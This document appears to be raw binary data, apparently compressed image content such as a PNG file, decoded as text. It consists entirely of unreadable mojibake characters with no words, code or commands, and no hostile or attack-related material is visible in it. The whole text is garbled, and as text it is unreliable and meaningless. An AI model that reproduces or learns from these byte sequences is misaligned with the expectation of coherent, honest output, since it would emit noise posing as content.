          1FèŒ[=òß°é©ãàðH:{àus£og#üaB-Oºþ<…P˜¿¿ RD/_¦E=ý¨k6ã•aïGT®L‡7m–ÝCCט/`þáÿï~Ò¹Öeb¬îjðâyŒ·lgÝ¢»¨Pµ€¿h¤Â7Š+IŠ)Ƨ=bb¼´¨œ²‰TÒYrÀæ¤ÀH«T¾c"ŠJFÈÿ‚©‘gÊ;wïÑñ'%ÜU6ÈxNóÃSpþüòîÞC<èå×Sâ‚ÐÞ/îŋ—¨G×nbLñ](3ºäÏ%âÅÅ{ð]xH5²S ­Ê*Ò÷ß}/Ïkכ@ŒÑ†Vù®Å{ïË5kגÐwغ™ïç'qUÈb0¤HÚknCáj¤¤oáq0ŠÊw%íì<‘yƒ‰ñ¥rE‹ÚªO˜p×8qßlÅäýøÇ9OÆo¶é˜½P
          ØBƒåä)ùz2¡S›4¡ù³g“§›“áÙ¬ûí¥â"2£áà’¿V15äÅ}XÁ„â/ñO”rÃ<Ʋ?iÒdjýQkêß·%,YžJ‚dkݑ"û‹£	:j4•ïŒI¸kÞá~‘êÊÁ&=bŒmêÍÉÿÈqƒÛÔ°#ÈsŽP³blÇ`ϰȇÝÓý‘Ii+±hïÞ¥+.!$Þ¼M!´I
          §ÀuÙ8IvŠX&Á™	ÿ&Šþm	—¯–º%,^çÒ1NÉ¿®/'Ož”,BYч„¿1ð›‘Ûyæ±Ã§Íi›‡/êÒìj Ü)pÍ8 ú¡:4&Ñî9l,Taž©‡2¥ò]5wÉHó´*ß!<—žØ¹“:— îoý¼Þù¿,‹^–EåPóxw7ïæ*øœÿWӅ8:HŽb%îØpà1\ª$ízÚ¹á‘k{ûN
          N—R0qðGPù.‰f.ÚðüV¾Óð"’bß(Jñ&³Ç|.Þ¸–¶BÞ°=šâ+'OÎQIZ„ìÙ½Gâ€aè›/®>‘Äj
          ž_ÔôžW<#w1bAz¥”ó´¯ÅŒvðxïÞ}ɍŒ×Azëש+óðÚAFâ|x¦Q~ۍ·úHò
          g—Ô¢´‡<ÌZøHzvÃ0d¸|òÍø¨•ÜäÈs‹'˜G¸Ô¢Ä¿·À˜Cæ«ÃR RÚÉÉ]&1§SöööN‚¸_¬˜»|åÛÔº÷Z‘ÿÍ[½q†ƒxûÆMúuèÐ|=­OŒë×­OÛþÙE6l¢±cÆQªU%Íby¿ýþGZ½vƒ„1"¯Oð¯Z³žæÍ_D?ýŒÊ—.+U!öDk×o¤uë6Ò§;ÑÀ^½)aá/©Ä§S9ñÔCxöóÃkêИDî“W¸o”â	ÇORp‰ri·©=ê“ÿ¦­zã`c®^½&yÓqÃÓÝCvJ2qÔBÊ`¿2óĂ¿ß¬¹TŸÓ—äøŠY¶‚t¼ÀI¹&Œ+#¤á{óÓJˆŠVß­rVÄ]¸D‘ƒGPHeW…„âs˜àùžm؜â¯^WÞ¬'kÖ¬%ËI<°¶s{
          »˜b„Òa¡†³8§‚ꩆúIwïSà´i=ØLŒ#>U<—®êИDO¸{Hݺ-çô†—­J3¾£G¡9«²‰¹4˜mj(ÏsY!†uñü¾ý4¶zuY±ªT)kT®D#ʗ§Á%JÐ ''¬-]ŠFWªhøs0¼LšT·íebcðSÀÜZ³Ëè;æSlSÓè(Â}š|@tç…D?¦Q3–’Y
          /²B6‡g!³¾†‰nN€v^DRá{ęÈ¤züÃOÁ¹Ïº¸·¼óá	A¯ž¤ƒ6›7ïI&‚Ÿ¶ï Æ)˖ýµLÈ®¡÷¶Ñ®_¿AC‘p
          ¤LÖïä/'ÓíÛwDa¡¬ـq…¡EŒb˜Cù5WüÝ®M[ñDàu6¾ð(ã5Cßi¸æk|ˆ“ÆoAîãÙ?ÎÎQH
          s†Á—²²EµñfætÃܖ‘”þ”$¥7š“ÔÆFŒYGßaLƒAO€7NŸÅ¡‘¦äàP¶Àƒýâ%šãí•ã“Ñ™AŸ×åIþïMÛèßý‡h箽´€	iû6í
          Ä{¼^b~;v¼Ä׃´4ãÅê|¿oÙºƒ9N«V¯¥L˜zûPÂ7ß«¹ùQNR/ZŒî‡žnP‡Å$é„û¦ú~B™§xã¬HWÅM
          §ˆ7. ½dýE¾ø£¼˜ßûï>Ú¹smݺMÂÌ@8—.ý‹õ ᆈ'ì	S'O–±Ò—Dä+0Lªð¥Ü;L’e÷¥\U
          kÙVÂe"û
          ¦ˆžý)¼Cg&¿ï)ïÅäŽ÷Ëý†÷W/rzypÿ¾œɈ¼k»z8½bå*!À8¤glõ>¶‘çÎ_»ž!áþó¿|•‚úUtׄkd‚©¦Žãq8É0š´—%[;;:þS²¸ckõ©îìƒéQdÏ~Š&™±`²/MACFfÿ¼^}ÿGè䉴uËÚ²9sà üÚå+h΄‰4wâ4÷‹,Àï™7éKúyútZ<kÖøõÛoåqóƒŸO‡9'Ò¼ÉShùâÅ®iè5 íàV~<vô˜„^úýÝå÷Ì[”zX•õTv5ø>£øx
          Ž2õ÷c…«vÝÀ¤r㳃Ïkwï5ÖnÞ		ovð"“bß$–É·vE1é8iã@~<ѣʗ–÷ãìzHáýyüÅ$ñ
          ÀS6Љ%ÈlvÛ@Ž1I|Âí`B([ª4ufã»|ÙrB8ÃÜ9sSˆqã
          iϞ½t’‰æV~eÄÞáu„ALåç$MK®±Ê‡¡&
          ‰÷»	ǾQnóe€¨h:Â7˜Ÿ¹™œ¬íĘÌmÁÛþÞGÄKSó‚îê°¨!1†7®t4ñô
          á‰9Åóœ¶Î¥,[™í-@ñà³ŽÌø¸uŽOFg†ôÄx㦭´“‰üî=ûèß}iÝúé¼ÇmŸª÷XóÏ/qG*Wº•/]š
          D+W­¡={ðµígv@þ߁ï«A]ºRâç“teq
          u«KIÛwAG“?©Ãb’tÂ}SŸ‘HwïQDûNz¡üè\‘‚&NÉ2ävE<Ulw°ó†Ç8ȋÿã0/ìÎ8€§'žB½Z¶hA>Äí’FâÙ^†"g±~þZ€Ç“¶|À߸§
          [+á Ú}¦Þkð„GNŸEI|-éeÛÖ­bo
          ‘v-\ÕHAz1À¶â·!T
          +Þ9qÅú
          WòÃ~üijÿòcH©Š3ã;¹ƒ½ü`»¥J•úŸ³ƒÓdÜïΎ%f¨O˜p¿”ãþ9A±±=yšÄ½¦èÏýAŸtÍvXšNB—/_¡/˜l¢Rm=^t£,yf¨ÃÀÎ@C~CžK³ƒF<÷6á…|ӦͨIÓ¦O 1Û܆üCŸ5„¸Ö:u^ßà߄ß5fÔhÉõž-î€]¡·(pì¾gTl)ßwÝ$ěâ¯nÜu¼ù›{ÛÛºø9<+­ákkíÑ£ƒ•›÷-&¸IOÞìàE'žIþÇ‹ÁJ<|”"yÕxÑÆ‘Æ™™I%/)òááAWϝÏxŸØƒq_»vpZ²ËI\.€÷Âc»ÿêÄ»¶õ‚/4ò¯6¨S7ÅèV,W^ÒÄ5oÜDB/@–ámƖñWS¦Ò­[·…´ú.CÀMC½lé_do§ûÀÁ’ô¡™ïà÷o]°º¾ö*õ`RŒÑs,,)‚‰q"Á5F]uX
          TŒC¸oš£Ÿ’nܤ0^LèOŠÁe*SàÔéÙ7è<ŸçÅΤF
          ăoˆäf)æñÎÛiÐéå—hJ£FOã;÷ˆ×xï¾ò¢Ú¶uѧ§å=ÎÊK¼OõdãÚÒ㎟Qâð1*1V·ÿ½Otóº?ŒÇa°:$&I'Ü7UØÎR³§¨¤à	2ˆ'ŌR¶eØTØ"8>7^ì !*Y-øù	ŸKV®'$þÒ
          ëÑSâÅ£­‘"
           ÂéŸÃÿ±KS®*EΞGIaajk©rçöm©¼¯púkʆJ¡°¥˜²k?Ÿr£ÐHU÷<ú9´ºųÎCx–¨CRà‚4‚LŒ§¢J88}«>]`Â}SŒ±ý»dYÚXx3;Ò5ý€üYG²KSÎïìܱC	™äæ[+s²43ϲ÷>´‡y_¿±ÂçŠè½GÿïüD3ùn|§Ù»…„$<x0{;Å¡¼¸;}–t»ñüÄv}]en=^‰Ëç1ÀÉ×7ÔayfR¬aªÖî^‡¬ÝsJñ_ Śð µÅ`%]¹JQõ›))Û̋¦d¦V¾ý»beŽNqbõø^9€bרR•ÿ²8G±¹€cþÞ'OѸ1c¥¬4bí °mÐNqcErŒç‘þ
          ¸™š4jL¿ÿþÝâ	‹¡ïЀïqñÅ#~ÃÅK—©·_O¹Igù—Ÿ‘PCŸ7b-ž'g‘øOáB´
          9Œù†‰™RRå -Ô!)P1FbÌýãÂý@!!²eªÓ¶úÉLÑ3Û¤¡-§ÿý—FU«"•ê߬àgaNýìl©¯|‹¦™-[$Æà=Þ»ï ­]·FCÕ+U¡Òùè=ή—Xÿšž ÆÃF¥zŒ±ý÷ñ§Ú¡&÷h¡‰IÒ	÷#cÂÒzòD,|ó–äÍpfŠìdäïSWØ;xêö»ë×)D1½$>xHÑßýD:&“Rý‹Kk°c`2G|4ëBhێûÏNƒžâH&«_M*ř]<®©}›¶tûÎÝ9GÒ÷6“ò¾?”¥o%‡1Ï[É/AGª¸‡­­íÿÁc¬ôƒÓ,õék“À‹ãàb<îÚ®ÆÚ­.¬ÿ;ëÝ7‹°ðpÚ¸aƒÔ*À"¿zå*4 o_š2éKúò‹/br
          &©0ü>à«É“iì¨ÑԜô˜Ë
          9dÐàLÛÏ/Lc}:x°~,Bk»{Hpƒý¡,ސ‘Â¥vJßb¾
          ©\“âÿüKê<3±ªíãaíî}ÚÆ£'“Ü\ãÿ)†ð ¹óX…¡²XL¯Àƒ¸Jï^/k+Z:nœä Ì®·[‚ˆ—Ãá8X(6âÏp`.§†Qó܂ÜnäIaİáTËÍ]ÚL¿¥Ï1¼ˆeCš5|>³øf\´ÏF1P˖-§õ|œ=sV²kÀãŒìðPçÔë-y£/›6‘¾Dìö0&P‘‘¢’Åýú‡v£lT‡£ÀÅH=Æ%»$~ÞBÅã•B:‹I/ì²C:p2úøŽíÔßɁp’ÙñÍÝÞz“ú;ØÓZ6Ú7§›ÇŽ¥àƑ#ôàÒ%úyþ|Ù24DŒñ3ݱs/͛»€Ú|ôq¾xsâ%ÖǓÄx´BŒaԙE
          ¡éè)†½:$&I'Ü7…3ÑW	{÷)ä
          SH‡}öIG&€cá@_oÑC^c<Ûø~óæiH’cc)þä)Šúa.…|ü‰ä.Æ=…¢8\§c¤«ÕÂú¡Ç«×SÂí´ú4Iæûqù_Iª8Äϧ¿׉ƒ„ßå0ÐÐéèѝ{8yšë¬ã"lK?ê ±›Üÿ÷«CRàblʇìeîŸO0vI—¯RhF)žwY •®L_ÍÌz÷MÃ)…0ÃV|@wïÜ¡ˆˆ
          ç×ÒåʱˆŠŽŽ¦ÇȝCQQQ¾?’Ÿ×1'ùnÖ,*òλ²ëŒxæŒÞŸŸÀu^b[ŽŠà/ Æ×o̚£Ï.ފSXÝ&”|J
          Ð<fLU‡ä™ˆ‰çBxJ1ö£
          Òã9(’ÎA{êQèÙ2F¡é­ZÉiþœ”QÄ!¸]»v‰…+Ê_á5f㘛­4[Lטœ8pæÍ›/ac9c‘â
          •è0ÄŠœ‘E› ë¨Ö׿£ÖÿäáêFu<<%›âù0Éàäô¸±ãrìñF|1r&ö,j!$ï&˜™Ñ=s;
          ¯×”’ϝ/%3)åèè!“šƒãéÒŋÅ!îIø¿‡I‡
          sÍӁ˜Èšµ)€ÉdvHGhtú{“èv†Õ”2€½©Z…‰ðq\ŠAY¼hQ¦ÄXƒ{¼fí5jßUså=΍—XcñrT¬A±‹—ßÅý¿™
          ´†1ú†û¨3ú*ñò
          «•Žt”¬DA_NËvȏ!À–±Žÿºø×Ã)ØC„!Uæ™3gpI%9.ŽnޖÜÅñÿî§ømÛ)~çnŠ?r”â/\¢Dþ¾ÌdÍê5äRUñªº¶•H‘š3'¡lO¶÷Ô
          ’øm&èWmñöÿì]|ÅÆú·K/)·{%¡‰HUEEPDbA@±÷Ž"ö®ˆ‚
          °aï¢(½Io‚©¹äÒ	ðþß7»{\ŽKH @óýò~››Ûv3oß~óæÍ›;ƒ·Å·Ý$‡å¨ŸV¨ªt4†d
          Vxô
          ¶4Ð{€$ptµ8Åw¡ãšUªB×®…ÈWíPH8¹lø´)SYÞÆü±œzâIÒóªvÉÁARR’Ü|#aµê1¯Ø+1¦~ÿ·A’Ô¢:á7ÜÞvê蜾‡Ýšï#ÐP$/Rh³Ð˜Ëax¨lÅ3÷ßýMΒES§•jE’Næ+~â±ÇUx‡Úºwí&ËV¬,ÕäµPq¼¿9ÛrÕ¹Ïp
          
          g<O?A­¾GÏÄÞ®Áó¬]·^žzr¸òh0YÅ0ƒ“?ãÜLŸÄ% yL¤sEÖÕÖ-[åˑ#UbqƳ>_œÁøb®&¶ÛËq…݇^¯·©×4sa̗66ŒÊvñ!T“žµüZÁêÕÐitpk֕¤Ý{8¾KÍ̒)Ÿ}®ôº´Ä˜¡·Ô©-Ï\|‘¼võՅäÅ+ºÈç?,£ßz[yl÷FŒ)VìñLùÛQ£Jï=ÞW/q¨IŒÑyKcçmù
          êè6H¹é¼•W ŽZBRv";<ä§ZŒ®îmj”ÂÁ*ÊcŒöà’ôԓP.Œ7f6¦¨œ<y22Cn^žÊÄ¡f†ÊEº¾#¼Ïư¯¯¾òj©…$+[û]R|!¹aí!êí«E©§ßcsŒÝ‡å‘£~˜‰êOÉ/¼1Xá46K©jçܞ7¿ø,?ˆñUݺ)/pQX¸`ôºú5½åÙg˹­Z©PË7^}ÕÞcO€h0v¬œvÒÉ*§$Ä»¬°e˵Šn©ˆ1~/P+]ªÎ°Óyƒdî¨{&wÙÍq@¡Iñ~DÒa¥Z»^²;v–Mµ\ò®½gî“|>ü©R…SPHP§L™ª2Ddr؅žW†.쳁„Ðó@bÌIu$±$Ýç´j­&üí-–˜BÒÌ%£éu®çõëñàùÛàÁ`ʤÒcÖÕʅåÙË/Wuh­xwšü\
          ½GW¼ä<\
          šé…jÚÍqÈQµjÕÓÜn÷å^øˍ‡uÄTCL"9÷>¼{rO5ô.W‰ÃÆbI‡Zõ.%E~yç5r_Rµ1$†“R{áÑ	•« µn-ï¼^tŒqQRZïñþz‰C%"1áàzsÃZñÅ!åjÑ’wŒ»…'&¦\¬ÄGàqæb4“Tœñ¸OUhB!ms¾µìn ôžS’Jæ:vëmâ…nD²Uá¢<Ç ÇÁxãÕ×Ðß¡lÎþàŸU«dè-·È™
          ªØáH×
          ’t:.Þ{o̾’¤mM¤—_—”ê»c·ÕŠw\¢òò¢Þ³q{ÛMQ.PN=ƌ3~šm¹söœÂ9·BÕ ©$¾þ¶šDV仾”ÄxÉâÅ*»C­ªÕUGJ­+€w.çî<;B­³òa{ƌ~WN?ùéóïØ¾ÝþæÀ£ÔĘu…ï¿ýQRð~ê(;o[ÈöÏ­¥ Q÷þ?ÊnŽMŠËh¨³Ð`ë%7O¶=õ¬dԈ‘É5c1¶Â)Ž“‘èÝq…¦Ò„S(¯-æÍ7ß
          ¦Nã$¶?øP)Ù¾’ccÎÐ~dÝ!Æ$¯%õêòÚ3gͶB%Š!ž\˜”Þé’u?„“¼f€¨«4mvÅÕ«Xù‹›·•ü?þt”ìfÐ(¨'ΨþŠ«lÿö‡Â+à1†³iIü¢øp
          zñ·lµ½ø¥\õŽÏÁU*Ë^<Ô¬©<Øä¬BrOýz2ªßõ2úÍ7¥m›ÒcJI½Çeá%•ˆÄ˜ÇÜõ%g¤H¢ŽÎòåÁCá3Œ&^Ãý~ÿgíÚµ+é¹PUÇ£ždå/\$©gœ½›t0üÇÛ@’˜¶
          ¤¢4’bŽnq2‰DQñ¼‘„“ôhw9W¢ïu½å«‰ÁÛ¹(mé°öväˆg¤Ã	w¤ëE'î™cüø	¥·ýééâ_°Xݯy³=q|öa2ûÝD¥Ž®Åm¶·›¢\ <cuu9Ût×æÍ’Ù£Wá:UáýÑáÈFm„¶+)1ތkìß_ezˆúCâÉ,SÓ¦NµØ
          EŒß½›çåÙßx”šƒ“ø×o¤G†«Ñ!•šÄ¸2—O¿\vá݃zπÜk7Ã&Åe4ó«ÕÅvàe™cn…ST¶Â)Ž?Vî¬/Ó`TãV£ž£îdwpz‹Ì̉nû:cˆ1
          2ÿèÏÔ#ÒÃ.¼ï../ñä;ÆcoÀ‹ŒÙ(—Ê0
          æ…U­¦¤W‰’Ì®W¬”dÈ
          v3h¨æ±¨«ÁÔÑ|èSZ›ów‡S¨á*¯$
          ¹½Øõ̬²aýòñý÷—zÕ;f¹»^=™òÁ²yÅ
          Ù¼|y!Ù´l™$­_'cÞ}·D1ÆEIQÞã+»])/¿òº¼õöh鵟^âP‰HŒO«©ê·`ÞêèNÈÛv3”˜1f;vX½†±¸Aƒ§ØÅ‡¨« ;TçÍCCÂ) §ôw¾Jüëþ+q8í³9ptŒù؍½„P%$²Œ÷mÞ¤©Z|‰!dóçÏW"Þå
          6ÈgŸ~*ƒo¾Y.»¸£º>'#•£8á1´Õ\ò™±É¥
          «à„¦¯¾³<q΄ƚ†Êiž;Z¥á'þB½Ÿh7C¹€MŒítmÆ+vñ!êŠùŒs4(ö¤P8u´U{ñÿ>ي™Ô¥ Æ3gÌP|O:Ã÷/usØÐ[í#vƒ¡cé1f(E·î²³<{Œ3³Ä?kŽ$Ÿ2·€ï¥Ú¦dß\RŸ«26±›á€@“â2Úì4˜ÃùßFÉîÜC¶Örɸµ‚«à1¾òë¯—“¬—‚s_A&§§g‹Ão|º]ÑU­‰Ïï"Wœì1vÂ0F>3RÝKIˆ1_(ô.Oþó/u|¤ó†JJV¶,˜ü§ÜâÂzc†;O?]¦V¯#îú²íéçXÕ|P8Ó¿ŽÝ{êŠ1œ~ÉɑôÌy9«¾ÝÅÊ8ÇUïÖþ³JÞ¹ù¦R¯zwÝѕä©víe{1qtÄØ1cö‹S"yé¥ãp4'‡‚8Tö$Æ÷ƒגÌ>œøÍrïÀën˗2êbnݺuOµ‹9 §ø“áÛ¿øºp&üot¶$¾ÿñÞ'8Aœ¯wÞ-
          ãë–ÊKIÏ-_öìTpQ$N:&Q¾îškT¾xJ¯ž=ULg§K.UDšâÒxª#‰ã½fl)ß%±¥	©©âÿw$Ýq¯5¡‰õá‚$év’][¨£LÓ6Ün‚ò„c|†1Øë2“ÝØÚe‡¨+†S¨uÞóç͗ÔMvlÔq¼»,zÎF)ˆñŸ“'ãûjžg«W®"=¯ºÊ>b78²ñÁ+ƘI÷e¤c_Q*bÌN.êD­vÇpûyg¸_*slûƒ:'êü[l޳›¡Ì¡Iñ­!d…êEŽ#™U£e^m—Ürúi–×ø¸cäÞ3ϔ¿'ýQªœÆxV×M›)ãL#Oã;uÚôR{Ž÷‡ó^6nÚ,Ï=ûœ:¶$ĘƼݹmÕò¥{3æ‰ø~óæ-òùðáj¸^…¢@FÂ8$¡gž~î…R°Xe£È‡¼cW¿F	€úª	G#Ãå¡SbéA
          ª6ëIÒ#Oiй‚ãêÅKäe¼øK»êc‹o3\òêÕ=䵞Wï!/]q…|þHé&ßíMB½ÇÜÿ Šë$¡¶Ÿ^âP	'Æ;‡Ý-©¾3$w̬fêéTÈÉv””cb|êë6Ö³SpcЃÄ&ã·¯ë'þèä^¼Æ|OŸ1Sڝs®²A‘lÓ¾
          ;ZìðóÅÏXO’%ø¬âA«[+Ž–ÄF–TRÇs¹e°²Õ{u²dfX“îBɶɐì;ïg5SG¹@Rs»	Ê|¾Ú5Ü1îæõ¢¢ÊEžz¨¯‹ ;´¬!wì9gã‚KÕD²ˆN†Rc†HÔ®^½X¢¾õ½î:ûˆÝPÄxìû1>ÈY)¶nÝ*7
          YĽ1Kó‡IŒb¹p‘$w½Z=ߪ!jžG‡³s¨£©!võ—94)>@@£QAùù‹–JÖÙçÊÆÚ†¼aO£瓱²oCYJ³D´#4‚Cx÷Ý÷Ô,ez±0Dù‰©t%ͼ?Ę÷Í	z&|Rb1³j0ÑøÒ¥Ë¬¸éçuD- 1eªÜsFµ²'Ý
          Eçâ‡êu$ä-{ð0TpNhâ7ªy4IJ¨kz5ƒCՎAïp™eÐ#t`œ¼ÒOu°òJG"ÀÅ	ŸÞÇ£&߅KÜÞã眳O“ïŠÇ{üÛ¤ÉòþØñüŒ‘Ÿ~þm¿¼Ä¡²1t›¤wè$»ðŒC?³ åfÁ„P”WbL Î8Qt“lß.Û^|(ç˅ÿôIDATµð
          c\†÷¬–’øéÄb½Æ´S´‰¿˜¨ìOY’ÓC-$ã—\t±¬Zýoñ6ŸÄyÝ’ôࣅ½ÅÕ¬¥Êó§LS¦uÍÕܘ'îpê,ò*Ovüô+:輝¦ådxìItL"8”n–4Æx“ôëÛ·H';IgÑH>úPErB(1¾ªû•*oöÁBRb¢èÛOc®|÷óO?G&ÆÔß@Š$~8õ‡gÜyÎé9æRå/¿®Î‡ºž9 £Ãš` á΃¤
          p?þ´d€h̨+70F–)®îiÐ@fÈ&Ѩ‡+É^Ä!­£Þ%9«„–—v~û­·ÕË`o˲?ĘÂõùgΜ¥žž“ð‡5T8üÇ}èáàu‹ë0¶xӆ2þÁ¥ïÿlo1:OU©&›Q—ÍZËÎ_~sޝœ`W½F	zãb3ÕPõ×ß©•¹
          t£®$=üxÄXcÕi™6M¥,-1f'‡ú¯ˆq¸€_
          büĹç»òÝþÈdœkڌÙ2BOr¤}öEB‰ñ°«{JþÉ¶'­Yâ¨çåŸ]õå
          åœ3¦z#æÏ_ ig¶ØÓkÜ«Ÿø7o)Ökœ}ýñǟ”
          ڗ¸Þò($GË`9ŽÜë`¡³ä×ß%åŒf»ŸqÖ:Yýov<PÏ~ȵvÕk”PMÎÙ¸^=ç[¶JFÞ–·Óž4¦BÓοDü³çîéd(1&¹ý믿¤Qý֒å!º@¦.ô¾öڈ±î1æ>-c8E¯ž×ȵ°SRVtå]ÕÚtžq𗢈1ÊT~í.W©‰‹ªî *cÊEdW‚
          õáZ/ØU_¦¨sîÀsj¶¸´vëAÁmb\*™Ö¤¸x ñªBÕjþÜ¿%û¬–²¡¶!¯¡‡¯¼Æ§œ¬† _¾újٚà/Þ¨!$®<ŽIê»Ãá<’[æ¾ý¶a2kö¥€Åyö•óºŒiæñœ|×òìæ{%ƜxwˆûïL.þܐdÜ÷œTCîô.Ò[<äôÓäûu$³¦ast:PÏÈ@»Ú5J¨&‡ª‡PGðb͸ªWaƒ^½mñƒ<†g¨P¡K–Ê+={ªÜÒýN:a¯qÆìÜp¤dÄEdú¸å¯÷ÇÊ_cÇX2æ=™úá2û³ÏdÖ§ŸÊ²?þ÷¸ò]…R)DŒñ2÷>]k×SG9éîM»ÚËÊ31& žPْ—'9O<-…–ˆæ”i±Þ}¿ØÉ¢ÙZ±b¥²'.—ÆkLÒÁ9’‘ámæùyîp²³7Q¶$‡ŽbøíþÕk$i蝖—Ý!ø?µqËиÍ? å.Ô§"ÕÇIxUNã/¿±¼œÎäF»#—t×ý{.JƒÿKJŒ	NäüÒ£t:x|ïÆy¼2dÐ Y·–	Eö„CŒ©3Ôå*§œª2Tp9éd©zÚéêšäEcŽƒ1½ª/çù¶=î9O=«~êx5¤±]íe†Zg8£f‹~±M­Õò†­µZ,´¸Áã6âoiR\ІÌiÜ¢:=GU£eVíXlÇ_üq2$:J¾ýuå+ʨ'4ˆ$§\œ¡$Çôó¡¹ô¢‹å¥^”•\=
          ŠÈЅp^*bŒcI²Iˆ“qÜ¿ÿ!CQ“˜Tê#< ¡/Gx/|5ÇÃüñÇãöæÁaú5+WÊ«½®é:N #Ñõ5²j5ÙZ-Jқ¶’?ÿê<(“!å*ýUEêŽñð‹è5V·B½ŽG7ߊÎ
          ô&Dw¨G[·&ÈÊùä›_”‡Z´PùŒé
          .Š ³#88ªŽüüò˪íö†±%\ù®¼H_ÓKnïqµÈÌÙêw ~·y@gPïÊ;1FÝUƒ¨5ßóÿž¯r™ò×pIr§îâ_º¬ÈÉ¢ÔWÚ::èÉ¢,	Éu†§™	ˆKéÒ¾q±‡”ì«ðÚ´—ô¢5ˆ¯+×àž.¿äReƒ#í.¼/fSyò‰'eãÆM{Øõ °<%E?ùL¥
          õ36³ß"۔ƒY}n¶«\£”€jãá6o‘¦n+ädˆ•äæçŠŸK™«¼Æ»Û§4Ę`êþ}¯WºH]àû¾M˖2é7k5bÌp†¦g6–;o¿Cž~r¸â‰*#GŒ»î¸C-`Ãg®HbŒÏþi3%¹M{«ÞXgå-¾°“@ÇQ¿ÊÁ€ŸS湋cZ
          ¬Z³ù€Öµ›ßtv¶76-µ´¼¡YTëMjŸÕ¿†}J¢€F¬
          QëÀ2gv‹ód+z@c«×T“ÈH 8©ìÑ6mdé¬Y*| ²”PhðIb™Oøî;ïR$Õ!È\{ŸCm#G>+³ð=='Ž§×™È·Ę«êÑØÒ0“ùåWÁÅCœý¨Ì\š±z·Ìýꤎã “¸üÒ˘RG•S˜÷óƁ7È?ü¨¼ãÅc¿ýbûþµ×ä†Ê§)#3QÜ~úé2¥F´d⅘uì:¨[z‹ËmŠ6Ã0*û¢Ý½=†q]TîÕô]hk:y„ÿ7l&‰c?Üc"uÃY¨fɌòåˆgäþ³Î²V'<ù¤=ˆ1³Ws›òõðá²tÒ$Yüë¯{Ê/¿È¢Ÿ~’5³g˘Šê1)¾cÐ 'àÈ1æe…
          à1¦“ábH–Š5~ö¥Âi±èUŠ“¤Q™Bu4ThwhÓ¦OŸ!×ö¼f¯ä˜ö“¹â¹Ìý?ÿ¬RËãstìú>}™-)‰
          ’jÚKæÕ~èÁ‡”]\²d©L›6]ºE·8âíâÇa³×­ÿoOF¨pÌ_(K»î[ܬìܝ^;ö¨¿út2lÿþGè$êÚq2pÂèÙWüëÖïîÀAWKJŒ™òïþ{ïU4fÕqt—ºÒ°^=¹ôâŽrÀòÛ/–Ó(1¦·kç.’ˆëfffJ®} …a\ºº÷µ½T<<C.÷ ÆäkÖYÙRBB(‚±Å/½¦~êv
          ¤©]ÝhKtæâLaº¦moŒ’ô—Ô1äþÊU¤½h'¨¼loôí+[¶l-Õ¢¡¢Œ>ïÚ5kåã>–+ ü4ì\Ž™/òíϗýÈË/½,?Â/^¼$˜YâñGcl®|Çå¢I~øBøä“Oåñ+»vSbå®^#H|IÈÿükŠÊ³ÌµüiìéþÇ1Ųå+”/n
          ¡Ñš÷ëo*Ï-óãÒ[<àÔSåt&ø2ÌhÝ^
          þ^à<(?BÊ݋܁iš=†¹lJT9›I
          Ôad&ëtǤɒêi <ÅÊ89¹ŽÅ?g^ÄE?¸ØG
          ÝÖ­~YøºtwýúÖRÑèØ8Ę¡7U­*wÆùäކ
          äžõ#Êí Ïoôêe-ðqbŒ”‰ñ•=äŽaÃe¾ÍvU—K„ãy周CƏb2÷6WiS/Nç%Êj“V’øéņT8vroä˜#g-A>hÃØ™§3!
          :Î,BK—-Wˆ®æŽ‰-–\‡m,‡ÁiƒI„׬]§2	‘(pËIÉ÷Üu·J片“býH¿S	žU?öIzèq«óàt$긭LwÜç¬Æ˜écWµÆ>ªyä&ê(3Td¾½pLê+'â
          ©òI+-!1f&‡‹ìaH0‹Š1¦>ŸÝ¤©<ùøã…ÎácN¾cJÁƒ‰¤¤$¹ùƛ‚“ï
          còÓ.ª
          g$©ŒnWË.tv¡Ÿy5–[ƒF)€Æd†
          µìUz|Yݯ•Tô®­&áQHÕ¬.Ÿ~zŸ²TÇÑP’|’œ¾þÚë*™<É.	,þϸ4z{9›™¹7éQ&æÃůa½úru÷+Uï“Døâ;¨u˜ÞŠçPž`lëz}Já¹Äó¿ÿ®Q/^Ÿ[Nv!æ%#+;è}Žxß¶0®xÈúÈN¬ôl¨N¸{¤Jù§FŒd¸HΈçY•|P¶@:ÛÕ\.ፊjMï=Èñ²¸˜˜h»¸ÜÕÉÜÛ½UÅææJÎ#OHr•8N¾Ta°ƒn-v’Óë±
          ·`Ÿù¿ÿ!Ý{¯ÜîõXéÜìð
          eê;k)Jz▞hÛö€M¾;PJŒï½ûnê(3Q”Çœ°…`ÆÄœÇ—²Çe.0£ÜNbE]¶†l”ü|Ù>á3I	ý¯:p±VHÅü…;pŽ„“cÚ3Žp‘`äÒ¡@ûÈQ3Ú,Ž®…K›»}‡üoB›JRŠž›žâ>½®S6š—ynÇ.rK;Éŏ8‚GÛJ€h»é„þäð½“b‡p|4^yÝÔ3즺¼àR)XcÅ£¢N¿Äæ$»š5ö¨Gêsë5ö\ImÒu¿›ì©\3®,úU°W1æÒ͟N˜ Bj໽éuŒúL=£³*zN„c•Çx×.U~0Ìc¼1†Þ£8‡E-æâ-f‡"íÌæ²ãëïÔ9P§‹±ñØÕ¬q8ÚØjØ]²ã×I’ék$›a¨Þ©VSzƒø©af®ˆ÷Ǹqûoìˆc¼éé˜={޼‚¡g5:3Hl¹uònrKODèF’Ì•™ß“óîǗÆ÷Ý/ß~û,_±RèHFš†~odØvþ[»NÞ»íV+ÃL ·ž~ºLB'"JF÷k¤ Y-ÉX£wð oWq¹Dœi¶Tõé2ÆÆÆFÙÅå¨O®Øø	P>Ú4ýÂË
          Åzqu¬OIzæ…â×þ‡0$Hy¡¿Ž#C]±Ê{ÌÎNIä¼_ž<ï¼
